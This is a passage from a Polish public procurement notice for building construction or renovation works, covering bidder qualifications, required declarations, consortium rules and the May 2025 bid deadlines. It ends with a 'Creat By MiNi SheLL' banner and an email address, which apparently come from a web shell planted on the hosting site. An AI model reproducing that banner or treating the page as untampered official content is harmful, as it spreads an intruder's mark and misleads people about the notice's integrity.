budowlane polegające na remoncie i/lub budowie i/lub przebudowie i/lub<br/>rozbudowie budynku o wartości nie mniejszej niż 60 000,00 zł brutto każda, która została wykonana w sposób należyty, w<br/>tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończona,<br/>Zamawiający zastrzega, iż przez jedna robotę budowlaną rozumie się wykonanie robót budowlanych w ramach jednej<br/>umowy/kontraktu/zlecenia.<br/>Wykonawca przedstawi wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu<br/>robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostaływykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie<br/>dokumenty;<br/>Wykaz ma potwierdzać spełnienie warunku opisanego w Rozdziale 9 ust. 1 pkt. 1.4ppkt.1) SWZ, zgodnie z załącznikiem nr 5 do<br/>SWZ.<br/>Dowody potwierdzające należyte wykonanie robót budowlanych, wykazanych w załączniku nr 5 do SWZ, o których mowa w<br/>Rozdziale 9ust. 1 pkt. 1.4ppkt. 1) SWZ.<br/>Dokument składa się w formie elektronicznej z kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony formularz oferty – załącznik nr 1 do SWZ.<br/>Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w formularzu oferty<br/>dane umożliwiające dostęp do tych dokumentów<br/>Jeżeli dotyczy:<br/>a) Pełnomocnictwo upoważniające do złożenia oferty (umocowanie do reprezentowania wykonawcy) - jeżeli w imieniu<br/>wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów określających status<br/>prawny wykonawcy.<br/>b) Pełnomocnictwo dla osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>c) Pełnomocnictwo dla osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118<br/>ustawy Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.<br/>Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia stanowi załącznik nr 2 do<br/>SWZ.<br/>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wzór oświadczenia stanowi załącznik nr 3 do<br/>SWZ.<br/>Jeżeli dotyczy:<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - oświadczenie, składane na podstawie art.<br/>117 ust. 4 ustawy Pzp, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy (konsorcjanci).<br/>Jeżeli dotyczy:<br/>Zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 4 do SWZ.<br/>Załącznik nr 6 do SWZ - Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz.U 2024, poz. 1320ze zm.), w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>3. W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny do Pełnomocnika Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem<br/>występującym jako Pełnomocnik.<br/>4. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający zastrzega<br/>sobie prawo do żądania przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę<br/>tych Wykonawców.<br/>5. Formularz oferty składa Pełnomocnik Wykonawców w imieniu wszystkich Wykonawców wspólnie ubiegających się oudzielenie zamówienia.<br/>6. Oświadczenie o braku podstaw wykluczenia z postępowania(załącznik nr 2 do SWZ)składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projektowanych postanowieniach<br/>umowy, które stanowią załącznik nr 7 do Specyfikacji Warunków Zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-21 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/up_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-21 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com